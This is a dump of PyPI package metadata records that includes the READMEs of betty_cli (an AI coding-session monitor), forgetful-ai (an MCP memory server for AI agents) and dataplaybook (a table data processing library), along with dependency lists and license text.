- **Goal tracking** — extracts the session goal and current objective, updating as the user gives new instructions
- **Progress assessment** — classifies sessions as `on_track`, `stalled`, or `spinning` using error rates, retry patterns, and tool diversity
- **Error spike detection** — warns when error rate exceeds 40% in recent tool calls
- **Retry loop detection** — flags when the same tool is called 3+ times consecutively
- **Stall detection** — notices gaps of 2+ minutes between turns
- **File change tracking** — logs Read/Write/Edit operations with line counts
- **Milestones** — marks every 10th tool call and 5th user message
- **LLM narrative** (optional) — generates a 2-3 sentence situation report describing current activity
- **Goal drift detection** (optional) — compares recent activity against the session goal and warns if the assistant has gone off track
- **Ask Betty** — press `?` to ask a natural-language question about the session; Betty answers citing turn numbers and file paths
### Configuration
The agent uses your existing LLM configuration (set via `betty config`). LLM features (narrative, drift detection, goal determination, Ask Betty) require a configured LLM provider. Heuristic detectors work without one.
| Setting | Default | Description |
|---------|---------|-------------|
| `enabled` | `false` | Enable the agent (opt-in) |
| `update_interval` | `5` | Minimum turns between LLM updates |
| `max_observations` | `50` | Max observations kept per session |
Observations and reports are cached to disk (`~/.cache/betty/`) and persist across restarts.
## License
MIT
| text/markdown | null | null | null | null | null | null | [] | [] | null | null | >=3.10 | [] | [] | [] | [
"click>=8.0",
"filelock>=3.0",
"litellm>=1.50",
"rich>=13.0",
"textual>=0.50",
"tomli-w>=1.0",
"tomli>=2.0; python_version < \"3.11\""
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:30:43.691718 | betty_cli-0.14.0.tar.gz | 101,956 | 61/af/d81d8c8dfe6b49267ad60694eae09fc8bf44d677245810e136a755529e7a/betty_cli-0.14.0.tar.gz | source | sdist | null | false | 08cdf45b949a0ebf76539702a3e84cc9 | c2c0f1ee91a9f291783e6ec2316557941a786392971bfea794d4bbf25bd1b7ec | 61afd81d8c8dfe6b49267ad60694eae09fc8bf44d677245810e136a755529e7a | null | [] | 240 |
2.4 | forgetful-ai | 0.2.3 | MCP Server for AI Agent Memory - persistent, semantically-searchable memory for AI agents | # Forgetful



[](https://github.com/jlowin/fastmcp)
[](https://github.com/qdrant/fastembed)
[](https://discord.gg/ngaUjKWkFJ)
**Forgetful** is a storage and retrieval tool for AI Agents. Designed as a Model Context Protocol (MCP) server built using the FastMCP framework. Once connected to this service, MCP clients such as Coding Agents, Chat Bots or your own custom built Agents can store and retrieve information from the same knowledge base.

---
## Table of Contents
- [Overview](#overview)
- [Features](#features)
- [Quick Start](#quick-start)
- [Some Examples](#usage-example)
- [How It Works](#how-it-works)
- [Configuration](#configuration)
- [Documentation](#documentation)
- [Contributing](#contributing)
- [License](#license)
---
## Overview
A lot of us are using AI Agents now, especially in the realm of software development. The pace at which work and decisions are made can make it difficult for you to keep up from a notes and context persistence perspective.
So if you are following something like the [BMAD Method](https://github.com/bmad-code-org/BMAD-METHOD) for example and you want to take your brain storming session you've just had with Claude on your desktop/mobile and use it for the basis of your next Claude Code session, then having a shared knowledge base across the two agents can help with this.
This is just one example use case to illustrate the point, more and more agentic applications are going to surface and the use cases for sharing data across them is going to increase.
Knowledge bases are going to become a key infrastructure component for your interactions with AIs. There are many excellent knowledge base solutions available (many for free on github) and I would encourage you to check them out and find one that works for you (even if Forgetful doesn't) as I found from personal experience that interactions with my agents got easier and more rewarding once they knew more about me, my work and previous interactions that I had had with them or other AI systems.
What makes **Forgetful** different from other Memory based MCP services is that it is a rather opinionated view on how AI Agents such store and retrieve data.
**Forgetful** imposes the [Zettelkasten principle](https://en.wikipedia.org/wiki/Zettelkasten) when clients wish to record memories, that is each memory must be atomic (one concept per note). Along with the note (title and content), we also ask the client / agent to provide context around what it was doing when creating the note, along with keywords and tags. With this information we create semantic embeddings and store these to aid with later retrieval and in addition to this we also automatically link the memory to existing memories that have a particular similarity score, allowing for the automatic construction of a knowledge graph.
In this sense **Forgetful** becomes a little bit like Obsidian for AI Agents, where the auto linking nudges them in building up a graph of the knowledge.
We find, [as do others (A-MEM: Agentic Memory or LLM Agents)](https://arxiv.org/abs/2502.12110), all this helps in ensuring that when the agent requires relevant information from the memory system later, the correct information is returned.
In addition to just memories, **Forgetful** also has the concept of entities (think organisation, people, products), projects, documents and code artifacts, all of which can be associated with one or more memories.

## Features
- Configure either **STDIO** or **HTTP** transport mechanism (or stand up two services to support both)
- Multiple Authentication supported, flows see [FastMCP docs](https://github.com/jlowin/fastmcp/tree/main/docs/servers/auth) for full list
- Meta Tool Discovery, only three tools exposed to client application to preserve context window.
- Flexible Storage– SQLite (default, zero-config) or PostgreSQL (for scale and production deployments)
- Stores memories as vectors and allowing memories to be retrieved from natural language queries from AI.
- Cross Encoder reranking to improve recall and precision of memory retrieval.
- Flexible ranking (embedding and cross encoder) providers, run everything locally without calls to the cloud thanks to FastEmbed
- Automatic linking of semantically similar memories, automating the creation of the knowledge graph.
For the complete roadmap, see [Features Roadmap](docs/features_roadmap.md).
---
## Quick Start
### Option 1: PyPI (Recommended)
```bash
# Run directly with uvx (no installation needed)
uvx forgetful-ai
# Or install globally
uv tool install forgetful-ai
forgetful
```
Data stored in platform-appropriate locations (`~/.local/share/forgetful` on Linux/Mac, `AppData` on Windows).
By default, runs with stdio transport for MCP clients. For HTTP:
```bash
uvx forgetful-ai --transport http --port 8020
```
### Option 2: From Source
```bash
git clone https://github.com/ScottRBK/forgetful.git
cd forgetful
# Install dependencies with uv
uv sync
# Run the server (uses SQLite by default)
uv run main.py
```
The server starts with stdio transport. For HTTP: `uv run main.py --transport http`
### Option 3: Docker Deployment (Production/Scale)
Forgetful provides two Docker deployment options:
#### SQLite with Docker (Simpler, Single-Container)
See [docker-compose.sqlite.yml](/docker/docker-compose.sqlite.yml)
```bash
cd docker
cp .env.example .env
# Edit .env: Set DATABASE=SQLite and SQLITE_PATH=data/forgetful.db
docker compose -f docker-compose.sqlite.yml up -d
```
The SQLite database persists in the `./data` directory on the host.
#### PostgreSQL with Docker (Recommended for multitenant)
See [docker-compose.postgres.yml](/docker/docker-compose.postgres.yml) and [.env.example](/docker/.env.example)
```bash
cd docker
cp .env.example .env
# Edit .env: Set DATABASE=Postgres and configure POSTGRES_* settings
docker compose -f docker-compose.postgres.yml up -d
```
**Note**: If no `.env` file exists, the application uses defaults from `app/config/settings.py`.
For all configuration options, see [Configuration Guide](docs/configuration.md).
### Connecting to An Agent
For detailed connection guides (Claude Code, Claude Desktop, other clients that support MCP), see [Connectivity Guide](docs/connectivity_guide.md).
- [Claude Code](docs/connectivity_guide.md#claude-code)
- [Copilot CLI](docs/connectivity_guide.md#copilot-cli) (includes [custom agents and skills](docs/copilot-cli/README.md))
- [Cursor](docs/connectivity_guide.md#cursor)
- [Codex](docs/connectivity_guide.md#codex)
- [Gemini CLI](docs/connectivity_guide.md#gemini-cli) (includes [custom commands](docs/gemini-cli/README.md))
- [Opencode](docs/connectivity_guide.md#opencode) (includes [custom commands and skills](docs/opencode/README.md))
Add Forgetful to your MCP client configuration:
**stdio transport (recommended for local use):**
```json
{
"mcpServers": {
"forgetful": {
"type": "stdio",
"command": "uvx",
"args": ["forgetful-ai"]
}
}
}
```
**HTTP transport (for Docker/remote):**
```json
{
"mcpServers": {
"forgetful": {
"type": "http",
"url": "http://localhost:8020/mcp"
}
}
}
```
---
## Usage Examples
Forgetful exposes tools through a **meta-tools pattern** - only 3 tools visible to your MCP client, with 42 tools accessible via `execute_forgetful_tool`. See [Complete Tool Reference](docs/tool_reference.md) for all tools.
### Example 1: Project-Scoped Memory
Create a memory linked to a project for better organization and scoped retrieval.
```python
# Create project for organizing related knowledge
project = execute_forgetful_tool(
"create_project",
{
"name": "E-Commerce Platform Redesign",
"project_type": "work",
"status": "active"
}
)
# Create memory linked to project
memory = execute_forgetful_tool(
"create_memory",
{
"title": "Payment gateway: Stripe chosen over PayPal",
"content": "Selected Stripe for better API docs, lower fees, and built-in fraud detection. PayPal lacks webhooks for subscription management.",
"importance": 9,
"tags": ["payment", "stripe", "decision"],
"project_id": project["project_id"]
}
)
# Later, query within project scope
results = execute_forgetful_tool(
"query_memory",
{
"query": "payment processing implementation",
"project_id": project["project_id"]
}
)
# Returns: Stripe decision + auto-linked related memories
```
### Example 2: Knowledge Graph with Entities
Track people, organizations, and relationships - perfect for team and infrastructure management.
```python
# New engineer joins your company
new_hire = execute_forgetful_tool(
"create_entity",
{
"name": "Jordan Taylor",
"entity_type": "Individual",
"description": "Backend Engineer - Payments Team",
"tags": ["engineering", "backend", "payments"]
}
)
# Get company entity (create if needed)
company = execute_forgetful_tool(
"create_entity",
{
"name": "TechFlow Systems",
"entity_type": "Organization",
"description": "SaaS platform company"
}
)
# Create employment relationship
execute_forgetful_tool(
"create_entity_relationship",
{
"from_entity_id": new_hire["entity_id"],
"to_entity_id": company["entity_id"],
"relationship_type": "works_for",
"metadata": {
"role": "Backend Engineer II",
"department": "Payments",
"start_date": "2025-01-20"
}
}
)
# Create memory about hiring
hire_memory = execute_forgetful_tool(
"create_memory",
{
"title": "Jordan Taylor hired - payments focus",
"content": "Jordan joins to build Stripe integration and handle PCI compliance. Previous experience with payment systems at FinanceApp Corp.",
"importance": 7,
"tags": ["team", "hiring", "payments"]
}
)
# Link person to memory
execute_forgetful_tool(
"link_entity_to_memory",
{
"entity_id": new_hire["entity_id"],
"memory_id": hire_memory["memory_id"]
}
)
# Query Jordan's related knowledge
results = execute_forgetful_tool(
"query_memory",
{"query": "Jordan payment implementation"}
)
# Returns: Hiring memory + linked entity + relationship context
```
### Tool Categories
Forgetful provides **42 tools** across **6 categories**:
- **Memory Tools** (7) – create, query, update, link, mark obsolete
- **Project Tools** (5) – organize knowledge by context/scope
- **Entity Tools** (15) – track people, orgs, devices; build knowledge graphs
- **Code Artifact Tools** (5) – store reusable code snippets
- **Document Tools** (5) – store long-form content (>400 words)
- **User Tools** (2) – profile and authentication
For complete documentation with extensive examples, see [Complete Tool Reference](docs/tool_reference.md).
---
## How It Works
### Atomic Memory Principle
Inspired by Zettelkasten, each memory stores **one concept** in ~300-400 words:
- **Easily titled** – Forces clarity (200 char limit)
- **Self-contained** – Understandable without external context
- **Linkable** – Small units enable precise knowledge graphs
For detailed content, use Documents and extract 3-7 atomic memories that link to the parent document.
### Automatic Knowledge Graph
When you create a memory:
1. **Embedding generated** – FastEmbed converts content to 384-dimensional vector
2. **Similarity search** – Finds top semantically-related memories (≥0.7 threshold)
3. **Auto-linking** – Creates bidirectional links to top 3-5 matches (configurable)
4. **Graph traversal** – Queries return primary results + 1-hop linked memories
### Entities and Knowledge Graphs
Entities represent concrete, real-world things (people, organizations, teams, devices) that can be linked to memories:
- **Typed entities** – Organizations, Individuals, Teams, Devices, or custom types
- **Relationships** – Directional connections (e.g., "Person works_at Organization") with strength and metadata
- **Memory linking** – Associate entities with relevant memories for context
- **Knowledge graph** – Build networks showing how entities relate to each other and your knowledge base
Use entities for concrete things (Sarah Chen, TechFlow Systems, Cache Server 01) and memories for abstract concepts (architectural patterns, decisions, learnings).
### Token Budget Management
Prevents context window overflow:
- Configurable budget (default 8K tokens)
- Results prioritized by importance (9-10 first) → recency (newest first)
- Truncates gracefully if over budget
- Respects max memory count (default 20)
This ensures agents get the most relevant context without overwhelming the LLM.
For deep dive on search architecture (dense → sparse → RRF → cross-encoder), see [Search Documentation](docs/search.md).
---
## Configuration
**No configuration required** – Forgetful uses sensible defaults out of the box.
### Key Settings (Optional)
- `MEMORY_TOKEN_BUDGET` – Max tokens for query results (default: `8000`)
- `EMBEDDING_MODEL` – Embedding model (default: `BAAI/bge-small-en-v1.5`)
- `MEMORY_NUM_AUTO_LINK` – Auto-link count (default: `3`, set `0` to disable)
- `SERVER_PORT` – HTTP server port (default: `8020`)
For all 40+ environment variables with detailed explanations, see [Configuration Guide](docs/configuration.md).
---
## Documentation
### Guides
- **[Core Concepts](docs/concepts.md)** – Memories vs Entities vs Documents explained
- **[Complete Tool Reference](docs/tool_reference.md)** – All 42 tools with extensive examples
- **[REST API Reference](docs/api_reference.md)** – HTTP endpoints for web UI integration
- [Configuration Guide](docs/configuration.md) – All environment variables explained
- [Connectivity Guide](docs/connectivity_guide.md) – Connect Claude and other MCP clients
- [Self-Hosting Guide](docs/self-hosting-guide.md) – Deploy on a VPS with Docker
- [Search Documentation](docs/search.md) – Embedding pipeline and retrieval architecture
- [Embedding Migration](docs/embedding_migration.md) – Switch embedding providers safely
- [Features Roadmap](docs/features_roadmap.md) – Planned features and priorities
### External Resources
- [MCP Protocol Specification](https://modelcontextprotocol.io/) – Model Context Protocol docs
- [pgvector](https://github.com/pgvector/pgvector) – PostgreSQL vector extension
- [FastEmbed](https://github.com/qdrant/fastembed) – Local embedding generation
- [Zettelkasten Principle](https://en.wikipedia.org/wiki/Zettelkasten) – Atomic note-taking method
---
## Contributing
We welcome contributions! Forgetful uses integration + E2E testing with Docker Compose orchestration.
See [Contributors Guide](docs/contributors.md) for:
- Testing workflows (integration tests, E2E tests, GitHub Actions)
- Development setup (local vs Docker)
- CI/CD pipeline details
- Release process
---
## License
MIT License - see [LICENSE](LICENCE.md) for details.
| text/markdown | null | Scott <scott@example.com> | null | null | MIT | null | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3.12",
"Topic :: Scientific/Engineering :: Artificial Intelligence"
] | [] | null | null | >=3.12 | [] | [] | [] | [
"aiosqlite>=0.21.0",
"alembic>=1.17.2",
"asyncpg>=0.30.0",
"dotenv>=0.9.9",
"fastapi>=0.116.1",
"fastembed>=0.7.3",
"fastmcp>=2.14.1",
"google-generativeai>=0.8.5",
"httpx>=0.28.1",
"openai>=2.8.0",
"pgvector>=0.4.1",
"platformdirs>=4.0.0",
"psycopg2-binary>=2.9.11",
"pydantic-settings>=2.10.1",
"pydantic>=2.11.7",
"pytest-asyncio>=0.24.0",
"pytest>=8.4.1",
"requests>=2.32.5",
"sqlalchemy[asyncio]>=2.0.44",
"sqlite-vec>=0.1.6",
"tiktoken>=0.12.0",
"uvicorn>=0.35.0",
"ollama>=0.4; extra == \"ollama\""
] | [] | [] | [] | [
"Homepage, https://github.com/scottrbk/forgetful",
"Repository, https://github.com/scottrbk/forgetful",
"Issues, https://github.com/scottrbk/forgetful/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:29:10.957721 | forgetful_ai-0.2.3.tar.gz | 180,854 | c7/4c/5a6bfb0ca3b576b2c23a8854f0b277b20fa55c6e96a7d060a0bcc8f6c442/forgetful_ai-0.2.3.tar.gz | source | sdist | null | false | 9cd0af4648db1d803fc0331d9d621e7c | 32157378406f8b881c60f6c429ea17a4f431d8d025ab00f26602b78ef81e6cd1 | c74c5a6bfb0ca3b576b2c23a8854f0b277b20fa55c6e96a7d060a0bcc8f6c442 | null | [
"LICENCE.md"
] | 322 |
2.3 | dataplaybook | 1.2.10 | Playbooks for data. Open, process and save table based data. | # Data Playbook
:book: Playbooks for data. Open, process and save table based data.
[](https://github.com/kellerza/data-playbook/actions)
[](https://codecov.io/gh/kellerza/data-playbook)
Automate repetitive tasks on table based data. Include various input and output tasks.
Install: `pip install dataplaybook`
Use the `@task` and `@playbook` decorators
```python
from dataplaybook import task, playbook
from dataplaybook.tasks.io_xlsx
@task
def print
```
## Tasks
Tasks are implemented as simple Python functions and the modules can be found in the dataplaybook/tasks folder.
| Description | Module | Functions |
|:-------------------------------------------------|-------------------------------|:-----------------------------------------------------------------------------------------------|
| Generic function to work on tables | `dataplaybook.tasks` | build_lookup, build_lookup_var, combine, drop, extend, filter, print, replace, unique, vlookup |
| Fuzzy string matching | `dataplaybook.taksk.fuzzy` | Requires _pip install fuzzywuzzy_ |
| Read/write excel files () | `dataplaybook.tasks.io_xlsx` | read_excel, write_excel |
| Misc IO tasks | `dataplaybook.tasks.io_misc` | read_csv, read_tab_delim, read_text_regex, wget, write_csv |
| MongoDB functions | `dataplaybook.tasks.io_mongo` | read_mongo, write_mongo, columns_to_list, list_to_columns |
| PDF functions. Requires _pdftotext_ on your path | `dataplaybook.tasks.io_pdf` | read_pdf_pages, read_pdf_files |
| Read XML | `dataplaybook.tasks.io_xml` | read_xml |
```bash
$ dataplaybook --all -vvv
dataplaybook.tasks
- build_lookup "(*, table: list[RowData], key: str, columns: list[str]) -> Generator[RowData]"
- build_lookup_dict "(*, table: list[RowData], key: str | list[str], columns: list[str] | None = None) -> dict[str | tuple, Any]"
- combine "(*, tables: list[list[RowData]], key: str, columns: list[str], value: Union[Literal[True], str] = True) -> list[RowData]"
- ensure_lists "(*, tables: Sequence[list[RowData]], columns: Sequence[str]) -> None"
- filter_rows "(*, table: list[RowData], include: dict[str, str] | None = None, exclude: dict[str, str | list[str] | re.Pattern] | None
= None) -> Generator[RowData]"
- print_table "(*, table: list[RowData] | None = None, tables: dict[str, list[RowData]] | DataEnvironment | None = None) -> None"
- remove_null "(*, tables: Sequence[list[RowData]]) -> None"
- replace "(*, table: list[RowData], replace_dict: dict[str, str], columns: list[str]) -> None"
- unique "(*, table: list[RowData], key: str) -> Generator[RowData]"
- vlookup "(*, table0: list[RowData], acro: list[RowData], columns: list[str]) -> None"
dataplaybook.tasks.fuzzy
- fuzzy_match "(*, table1: list[RowData], table2: list[RowData], t1_column: str, t2_column: str, t1_target_column: str) -> None"
dataplaybook.tasks.ietf
- add_standards_column "(*, table: list[RowData], columns: list[str], rfc_col: str) -> None"
- extract_standards_from_table "(*, table: list[RowData], extract_columns: list[str], include_columns: list[str] | None = None, name: str = '', line_offset: int = 1) -> Generator[RowData]"
dataplaybook.tasks.gis
- linestring "(*, table: list[RowData], lat_a: str = 'latA', lat_b: str = 'latB', lon_a: str = 'lonA', lon_b: str = 'lonB', linestring_column: str = 'linestring', error: str = '22 -22') -> list[RowData]"
dataplaybook.tasks.io_mail
- mail "(*, to_addrs: list[str] | str, from_addr: str, subject: str, server: str, files: list[str] | None = None, priority: int = 4, body: str | None = '', html: str | None = '', cc_addrs: list[str] | None = None, bcc_addrs: list[str] | None = None) -> None"
dataplaybook.tasks.io_misc
- file_rotate "(*, file: os.PathLike | str, count: int = 3) -> None"
- glob "(*, patterns: list[str]) -> Generator[RowData]"
- read_csv "(*, file: os.PathLike | str, columns: dict[str, str] | None = None) -> Generator[RowData]"
- read_json "(*, file: os.PathLike | str) -> list[RowData]"
- read_tab_delim "(*, file: os.PathLike | str, headers: list[str]) -> Generator[RowData]"
- read_text_regex "(*, file: os.PathLike | str, newline: re.Pattern, fields: re.Pattern | None) -> Generator[RowData]"
- wget "(*, url: str, file: os.PathLike | str, age: int = 172800, headers: dict[str, str] | None = None) -> None"
- write_csv "(*, table: list[RowData], file: os.PathLike | str, header: list[str] | None = None) -> None"
- write_json "(*, data: dict[str, list[RowData]] | DataEnvironment | list[RowData], file: os.PathLike | str, only_var: bool = False) ->
None"
dataplaybook.tasks.io_mongo
- columns_to_list "(*, table: 'list[RowData]', list_column: 'str', columns: 'list[str]') -> 'None'"
- list_to_columns "(*, table: 'list[RowData]', list_column: 'str', columns: 'list[str]') -> 'None'"
- mongo_delete_sids "(*, mdb: 'MongoURI', sids: 'list[str]') -> 'None'"
- mongo_list_sids "(*, mdb: 'MongoURI') -> 'list[str]'"
- mongo_sync_sids "(*, mdb_local: 'MongoURI', mdb_remote: 'MongoURI', ignore_remote: 'abc.Sequence[str] | None' = None, only_sync_sids:
'abc.Sequence[str] | None' = None) -> 'None'"
- read_mongo "(*, mdb: 'MongoURI', set_id: 'str | None' = None) -> 'Generator[RowData]'"
- write_mongo "(*, table: 'list[RowData]', mdb: 'MongoURI', set_id: 'str | None' = None, force: 'bool' = False) -> 'None'"
dataplaybook.tasks.io_pdf
- read_pdf_files "(*, folder: str, pattern: str = '*.pdf', layout: bool = True, args: list[str] | None = None) -> Generator[RowData]"
- read_pdf_pages "(*, file: os.PathLike | str, layout: bool = True, args: list[str] | None = None) -> Generator[RowData]"
dataplaybook.tasks.io_xlsx
- read_excel "(*, tables: dict[str, list[RowData]] | DataEnvironment, file: os.PathLike | str, sheets: list[dataplaybook.tasks.io_xlsx.Sheet] | None = None) -> list[str]"
- write_excel "(*, tables: dict[str, list[RowData]] | DataEnvironment, file: os.PathLike | str, include: list[str] | None = None, sheets: list[dataplaybook.tasks.io_xlsx.Sheet] | None = None, ensure_string: bool = False) -> None"
dataplaybook.tasks.io_xml
- read_lxml "(*, tables: dict[str, list[RowData]] | DataEnvironment, file: str, targets: list[str]) -> None"
- read_xml "(*, tables: dict[str, list[RowData]] | DataEnvironment, file: str, targets: list[str]) -> None"
```
## Local development
uv is used for dependency management. To install the dependencies.
```bash
uv sync --all-extras
```
pre-commit is used for code formatting and linting. Install pre-commit and run `pre-commit install` to install the git hooks.
```bash
uv tool install prek
prek install
```
Test locally using pre-commit (ruff, codespell, mypy)
```bash
git add . && prek
```
## Data Playbook v0 - origins
Data playbooks was created to replace various snippets of code I had lying around. They were all created to ensure repeatability of some menial task, and generally followed a similar structure of load something, process it and save it. (Process network data into GIS tools, network audits & reporting on router & NMS output, Extract IETF standards to complete SOCs, read my bank statements into my Excel budgeting tool, etc.)
For many of these tasks I have specific processing code (`tasks_x.py`, loaded with `modules: [tasks_x]` in the playbook), but in almost all cases input & output tasks (and configuring these names etc) are common. The idea of the modular tasks originally came from Home Assistant, where I started learning Python and the idea of "custom components" to add your own integrations, although one could argue this also has similarities to Ansible playbooks.
In many cases I have a 'loose' coupling to actual file names, using Everything search (`!es search_pattern` in the playbook) to resolve a search pattern to the correct file used for input.
It has some parts in common with Ansible Playbooks, especially the name was chosen after I was introduced to Ansible Playbooks. The task structure has been updated in 2019 to match the Ansible Playbooks 2.0/2.5+ format and allow names. This format will also be easier to introduce loop mechanisms etc.
### Comparison to Ansible Playbooks
Data playbooks is intended to create and modify variables in the environment (similar to **inventory**). Data playbooks starts with an empty environment (although you can read the environment from various sources inside the play).
Although new variables can be created using **register:** in Ansible, data playbook functions requires the output to be captured through `target:`.
Data playbook tasks are different form Ansible's **actions**:
- They are mostly not idempotent, since the intention is to modify tables as we go along,
- they can return lists containing rows or be Python iterators (that `yield` rows of a table)
- if they dont return any tabular data (a list), the return value will be added to the `var` table in the environment
- Each have a strict voluptuous schema, evaluated when loading and during runtime (e.g. to expand templates) to allow quick troubleshooting
You could argue I can do this with Ansible, but it won't be as elegant with single item hosts files, `gather_facts: no` and `delegate_to: localhost` throughout the playbooks. It will likely only be half as much fun trying to force it into my way of thinking.
## Release
Semantic versioning is used for release.
To create a new release, include a commit with a :dolphin: emoji as a prefix in the commit message. This will trigger a release on the master branch.
```bash
# Patch
git commit -m ":dolphin: Release 0.0.x"
# Minor
git commit -m ":rocket: Release 0.x.0"
```
| text/markdown | Johann Kellerman | Johann Kellerman <kellerza@gmail.com> | null | null | Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. | data, excel, generators, mongodb, tables | [
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"Natural Language :: English",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14"
] | [] | null | null | >=3.12 | [] | [] | [] | [
"cattrs<27,>=24",
"colordict>=1.2.6",
"colorlog<7,>=6",
"fuzzywuzzy",
"icecream",
"jinja2<4,>=3",
"office365-rest-python-client<3,>2",
"openpyxl==3.1.5",
"python-levenshtein",
"requests<3,>=2",
"typeguard>=4.4.2",
"whenever<1,>=0.9",
"lxml<7,>=5.4; extra == \"all\"",
